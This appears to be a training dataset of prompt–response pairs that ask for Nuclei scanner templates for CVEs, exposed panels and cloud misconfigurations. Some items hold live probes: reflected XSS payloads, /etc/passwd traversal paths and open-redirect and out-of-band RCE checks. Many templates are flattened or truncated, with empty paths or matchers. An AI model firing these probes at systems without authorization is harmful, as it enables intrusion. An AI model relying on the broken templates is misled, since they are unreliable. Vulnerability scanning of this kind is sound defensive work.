Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: graphite-browser info: name: Graphite Browser Login Panel - Detect author: 0x_Akoko severity: info description: Graphite Browser login panel was detected. tags: graphite,panel,discovery http: - method: GET path: - "{{BaseURL}}/" matchers: - type: word words: - "<title>Graphite Browser</title>" part: body - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2021-21345
Title: Code Injection in netapp oncommand_insight and others Summary: XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16. Vulnerability Type: Code Injection Severity: medium Affected Products: netapp oncommand_insight, apache activemq, apache jmeter Indicators: error, vulnerability detected
id: CVE-2021-21345 info: name: XStream < 1.4.16 - Remote Code Execution author: pwnhxl,vicrack severity: critical description: XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project,vuln http: - method: GET path: matchers: - type: word words: - "http" part: interactsh_protocol - type: word words: - "User-Agent: curl" part: interactsh_request
cve
medium
CVE-2021-21345
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: kafka-connect-ui info: name: Apache Kafka Connect UI Login Panel - Detect author: pdteam severity: info description: Apache Kafka Connect UI login panel was detected. tags: panel,kafka,apache,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>Kafka Connect UI</title>"
cwe
medium
CWE-200
Generate a Nuclei template for: ElastiCache Event Notifications - Disabled
Title: ElastiCache Event Notifications - Disabled Summary: ElastiCache Event Notifications - Disabled. Ensure that your Amazon ElastiCache clusters are configured to send event notifications via Amazon Simple Notification Service (SNS) in order to monitor your cache clusters for important events and quickly mitigate any issues with your cache system. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: cache-event-notification-disabled info: name: ElastiCache Event Notifications - Disabled author: DhiyaneshDK severity: medium description: Ensure that your Amazon ElastiCache clusters are configured to send event notifications via Amazon Simple Notification Service (SNS) in order to monitor your cache clusters for important events and quickly mitigate any issues with your cache system. tags: cloud,devops,aws,amazon,elasticache,aws-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
cache-event-notification-disabled
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: neobox-panel info: name: Neobox Web Server Login Panel - Detect author: pikpikcu severity: info description: Neobox Web Server login panel was detected. tags: panel,neobox,webserver,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "ng-app="NeoboxUI" ng-controller="GlobalCtrl">" part: body - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2024-54767
Title: Vulnerability (CWE-203) in CVE-2024-54767 Summary: An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication. NOTE: this is disputed by the Supplier because it cannot be reproduced, and the issue report focuses on an unintended configuration with direct Internet exposure. Vulnerability Type: Vulnerability (CWE-203) Severity: high Indicators: error, vulnerability detected
id: CVE-2024-54767 info: name: AVM FRITZ!Box 7530 AX - Unauthorized Access author: DhiyaneshDK severity: high description: An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication. tags: cve,cve2024,fritz!box,info-leak,unauth,vuln http: - method: GET path: matchers: - type: word words: - "<e:BoxInfo" part: body - type: word words: - "text/xml" part: content_type - type: status status: - 200
cve
high
CVE-2024-54767
Generate a Nuclei template for CVE-2020-11034
Title: Vulnerability (CWE-185) in glpi-project glpi Summary: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6. Vulnerability Type: Vulnerability (CWE-185) Severity: medium Affected Products: glpi-project glpi Indicators: error, vulnerability detected
id: CVE-2020-11034 info: name: GLPI <9.4.6 - Open Redirect author: pikpikcu severity: medium description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp. tags: cve,cve2020,redirect,glpi,glpi-project,vuln http: - method: GET path: - "{{BaseURL}}/index.php?redirect=/\/interact.sh/" - "{{BaseURL}}/index.php?redirect=//interact.sh" matchers: - type: regex part: header
cve
medium
CVE-2020-11034
Generate a Nuclei template for: telegram phishing Detection
Title: telegram phishing Detection Summary: telegram phishing Detection. A telegram phishing website was detected Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: telegram-phish info: name: telegram phishing Detection author: rxerium severity: info description: A telegram phishing website was detected tags: phishing,telegram,osint,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed." - type: status status: - 200 - type: dsl
generic
info
telegram-phish
Generate a Nuclei template for: ROOT - Path Disclosure
Title: ROOT - Path Disclosure Summary: ROOT - Path Disclosure. Detects potential exposure of sensitive file paths like /000~ROOT~000/. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: root-path-disclosure info: name: ROOT - Path Disclosure author: soltanali0,ArganexEmad severity: high description: Detects potential exposure of sensitive file paths like /000~ROOT~000/. tags: misconfig,exposure,info-leak,listing,lfr,vuln http: - method: GET path: - "{{BaseURL}}/home/000~ROOT~000/etc/passwd" - "{{BaseURL}}/000~ROOT~000/etc/passwd" - "{{BaseURL}}/OLDS/home/000~ROOT~000/etc/passwd" - "{{BaseURL}}/app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd" matchers: - type: regex part: body - type: regex part: accept_ranges - type: status status: - 200
generic
high
root-path-disclosure
Generate a Nuclei template for CVE-2024-54763
Title: Unknown Vulnerability in CVE-2024-54763 Summary: An access control issue in the component /login/hostinfo.cgi of ipTIME A2004 v12.17.0 allows attackers to obtain sensitive information without authentication. Vulnerability Type: Unknown Vulnerability Severity: medium Indicators: error, vulnerability detected
id: CVE-2024-54763 info: name: ipTIME A2004 - Unauthorized Access author: ritikchaddha severity: medium description: An access control issue in the component /login/hostinfo.cgi of ipTIME A2004 v12.17.0 allows attackers to obtain sensitive information without authentication. tags: cve,cve2024,iptime,router,unauth,exposure,vkev,vuln http: - method: GET path: - "{{BaseURL}}/login/hostinfo.cgi" matchers: - type: regex - type: word words: - "text/plain" part: content_type - type: status status: - 200
cve
medium
CVE-2024-54763
Generate a Nuclei template for CVE-2024-7928
Title: Path Traversal in fastadmin fastadmin Summary: A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component. Vulnerability Type: Path Traversal Severity: medium Affected Products: fastadmin fastadmin Indicators: error, vulnerability detected
id: CVE-2024-7928 info: name: FastAdmin < V1.3.4.20220530 - Path Traversal author: s4e-io,Hel10-Web severity: medium description: A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component. tags: cve,cve2024,fastadmin,lfi,vkev,vuln http: - method: GET path: matchers: - type: word words: - "jsonpReturn(" - ""password":" - ""username":" - ""database":" part: body condition: and - type: word words: - "application/javascript" part: content_type - type: status status: - 200
cve
medium
CVE-2024-7928
Generate a Nuclei template for CVE-2023-32563
Title: Path Traversal in ivanti avalanche Summary: An unauthenticated attacker could achieve the code execution through a RemoteControl server. Vulnerability Type: Path Traversal Severity: critical Affected Products: ivanti avalanche Indicators: error, vulnerability detected
id: CVE-2023-32563 info: name: Ivanti Avalanche - Remote Code Execution author: princechaddha severity: critical description: An unauthenticated attacker could achieve the code execution through a RemoteControl server. tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive,vkev,vuln http: - method: GET path: matchers: - type: word words: - "CVE-2023-32563" part: body_2
cve
critical
CVE-2023-32563
Generate a Nuclei template for: Charity Search API Test
Title: Charity Search API Test Summary: Charity Search API Test. Non-profit charity data. Tags: token-spray, charity, search Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: api-charity info: name: Charity Search API Test author: daffainfo severity: info description: Non-profit charity data tags: token-spray,charity,search http: - method: GET path: - "http://data.orghunter.com/v1/charitybasic?user_key={{token}}&ein=590774235" matchers: - type: status status: - 200 - type: word words: - ""ein":" - ""name":" - ""inCareOfName"" part: body condition: and
generic
info
api-charity
Generate a Nuclei template for CVE-2023-27641
Title: Cross-Site Scripting (XSS) in lsoft listserv Summary: The REPORT (after z but before a) parameter in wa.exe in L-Soft LISTSERV 16.5 before 17 allows an attacker to conduct XSS attacks via a crafted URL. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: lsoft listserv Indicators: error, vulnerability detected
id: CVE-2023-27641 info: name: L-Soft LISTSERV 16.5 - Cross-Site Scripting author: ritikchaddha severity: medium description: The REPORT (after z but before a) parameter in wa.exe in L-Soft LISTSERV 16.5 before 17 allows an attacker to conduct XSS attacks via a crafted URL. tags: cve2023,cve,xss,listserv,edb,lsoft,vuln http: - method: GET path: - "{{BaseURL}}/wa.exe?REPORT&z=4&"><script>alert(document.domain)</script>a=1" matchers: - type: word words: - "><script>alert(document.domain)</script>" - "LISTSERV" part: body condition: and - type: word words: - "text/html" part: content_type - type: status status: - 200
cve
medium
CVE-2023-27641
Generate a Nuclei template for: Confluence OAuth Administration Endpoint
Title: Confluence OAuth Administration Endpoint Summary: Confluence OAuth Administration Endpoint. Tags: misconfig, jira, confluence Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: confluence-oauth-admin info: name: Confluence OAuth Administration Endpoint author: DhiyaneshDK severity: info description: Confluence OAuth Administration Endpoint tags: misconfig,jira,confluence,atlassian,vuln http: - method: GET path: - "{{BaseURL}}/plugins/servlet/oauth/view-consumer-info" - "{{BaseURL}}/confluence/plugins/servlet/oauth/view-consumer-info" matchers: - type: word words: - "<title>OAuth Consumer Information" - "OAuth Administration" - type: status status: - 200
generic
info
confluence-oauth-admin
Generate a Nuclei template for: Resource Location Restrictions Not Configured
Title: Resource Location Restrictions Not Configured Summary: Resource Location Restrictions Not Configured. Ensure that the locations where location-based cloud resources can be created within your GCP organization are defined using the "Google Cloud Platform - Resource Location Restriction" organization policy. This constraint policy helps you achieve regulatory compliance by explicitly defining the locations allowed to deploy Google Cloud resources for your organization. You can specify multi-regions such as "asia" and "europe" and individual regions su Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: gcloud-org-resource-locations info: name: Resource Location Restrictions Not Configured author: princechaddha severity: medium description: Ensure that the locations where location-based cloud resources can be created within your GCP organization are defined using the "Google Cloud Platform - Resource Location Restriction" organization policy. This constraint policy helps you achieve regulatory compliance by explicitly defining the locations allowed to deploy Google Cloud resources for your organization. You can specify multi-regions such as "asia" and "europe" and individual regions such as "us-east1" or "europe-west2" as allowed locations. tags: cloud,devops,gcp,gcloud,resourcemanager,security,compliance,location,gcp-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
gcloud-org-resource-locations
Generate a Nuclei template for: Milvus - Detect
Title: Milvus - Detect Summary: Milvus - Detect. Milvus was detected.. Tags: tech, vector-database, milvus Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: milvus-detect info: name: Milvus - Detect author: s4e-io severity: info description: Milvus was detected. tags: tech,vector-database,milvus,detect,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>Milvus" - "<title>Milvus Demo" - "<title>Milvus Insight" - "<title>Milvus Enterprise Manager" part: body condition: or
generic
info
milvus-detect
Generate a Nuclei template for: Exposed VPC Endpoint
Title: Exposed VPC Endpoint Summary: Exposed VPC Endpoint. Identify and secure fully accessible Amazon VPC endpoints to prevent unauthorized access to AWS services. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: vpc-endpoint-exposed info: name: Exposed VPC Endpoint author: princechaddha severity: medium description: Identify and secure fully accessible Amazon VPC endpoints to prevent unauthorized access to AWS services. tags: cloud,devops,aws,amazon,vpc,aws-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
vpc-endpoint-exposed
Generate a Nuclei template for: SMB Anonymous Access Detection
Title: SMB Anonymous Access Detection Summary: SMB Anonymous Access Detection. Detects anonymous access to SMB shares on a remote server. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: smb-anonymous-access info: name: SMB Anonymous Access Detection author: pussycat0x severity: high description: Detects anonymous access to SMB shares on a remote server. tags: js,network,smb,enum,misconfig,vuln http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
smb-anonymous-access
Generate a Nuclei template for: SSRPM - Arbitary Password Reset on Default Client Interface Installation
Title: SSRPM - Arbitary Password Reset on Default Client Interface Installation Summary: SSRPM - Arbitary Password Reset on Default Client Interface Installation. The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: ssrpm-arbitrary-password-reset info: name: SSRPM - Arbitary Password Reset on Default Client Interface Installation author: vince-isec severity: high description: The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account. tags: ssrpm,intrusive,vuln http: - method: GET path: matchers: - type: word words: - ""ErrorCode":-55" - ""Success":false" part: body condition: and - type: word words: - "application/json" part: content_type - type: status status: - 200
generic
high
ssrpm-arbitrary-password-reset
Generate a Nuclei template for CVE-2016-1000133
Title: Cross-Site Scripting (XSS) in designsandcode forget_about_shortcode_buttons Summary: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: designsandcode forget_about_shortcode_buttons Indicators: error, vulnerability detected
id: CVE-2016-1000133 info: name: WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting author: daffainfo severity: medium description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode,vuln http: - method: GET path: matchers: - type: word words: - "Forget About Shortcode Buttons =" - method: GET path: - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cve
medium
CVE-2016-1000133
Generate a Nuclei template for: Linux Account Lockout Threshold Check
Title: Linux Account Lockout Threshold Check Summary: Linux Account Lockout Threshold Check. The system did not enforce an account lockout threshold, leaving it exposed to brute-force attacks through unrestricted login attempts. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: linux-account-lockout-threshold info: name: Linux Account Lockout Threshold Check author: songyaeji severity: high description: The system did not enforce an account lockout threshold, leaving it exposed to brute-force attacks through unrestricted login attempts. tags: local,linux,kisa,audit,compliance http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
linux-account-lockout-threshold
Generate a Nuclei template for: Remote Desktop Users Can Redirect Drives
Title: Remote Desktop Users Can Redirect Drives Summary: Remote Desktop Users Can Redirect Drives. Checks if Remote Desktop users are allowed to redirect local drives, which can pose a security risk. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: rdp-drive-redirection-allowed info: name: Remote Desktop Users Can Redirect Drives author: princechaddha severity: medium description: Checks if Remote Desktop users are allowed to redirect local drives, which can pose a security risk. tags: rdp,drive-redirection,code,windows-audit http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
rdp-drive-redirection-allowed
Generate a Nuclei template for: S3 Bucket with Public WRITE_ACP Access
Title: S3 Bucket with Public WRITE_ACP Access Summary: S3 Bucket with Public WRITE_ACP Access. Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions. Vulnerability Type: Security Check Severity: critical Indicators: vulnerability detected
id: s3-public-write-acp info: name: S3 Bucket with Public WRITE_ACP Access author: princechaddha severity: critical description: Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions. tags: cloud,devops,aws,amazon,s3,aws-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
critical
s3-public-write-acp
Generate a Nuclei template for: Yii Error Page - Detct
Title: Yii Error Page - Detct Summary: Yii Error Page - Detct. Yii (An application framework to handle and manage errors) error page detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: yii-error-page info: name: Yii Error Page - Detct author: DhiyaneshDk severity: info description: Yii (An application framework to handle and manage errors) error page detected. tags: exposure,yii,logs,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>yii\base\ErrorException</title>" part: body - type: status status: - 500
generic
info
yii-error-page
Generate a Nuclei template for: Detect Overview Kubernetes Resource Report
Title: Detect Overview Kubernetes Resource Report Summary: Detect Overview Kubernetes Resource Report. Information Disclosure of Kubernetes Resource Report Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: kubernetes-resource-report info: name: Detect Overview Kubernetes Resource Report author: pussycat0x severity: medium description: Information Disclosure of Kubernetes Resource Report tags: kubernetes,exposure,misconfig,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "Overview - Kubernetes Resource Report" part: body - type: status status: - 200
generic
medium
kubernetes-resource-report